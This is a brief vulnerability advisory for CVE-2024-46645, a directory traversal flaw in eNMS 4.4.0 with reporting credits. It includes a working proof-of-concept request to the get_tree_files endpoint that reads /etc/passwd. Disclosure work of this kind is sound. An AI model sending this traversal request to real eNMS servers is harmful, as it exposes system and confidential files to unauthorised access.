# **CVE-2024-46645**
# Details
* **Vulnerability Type**: eNMS 4.4.0 Directory Traversal via get_tree_files
* **Affected Application**: eNMS
* **Affected Versions**: 4.4.0
* **Affected Component**: /get_tree_files/>[DIR]
* **Impact**: Unauthorized access to sensitive files, potential exposure of confidential information.
## ```GET /get_tree_files/>[DIR]>[FILE]```
```
GET /get_tree_files/>etc/>passwd
```
# References
https://nvd.nist.gov/vuln/detail/CVE-2024-46645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-46645
# Credits
**Andrea Pessione** and **Manuel Scala** - SK IT Cyber Security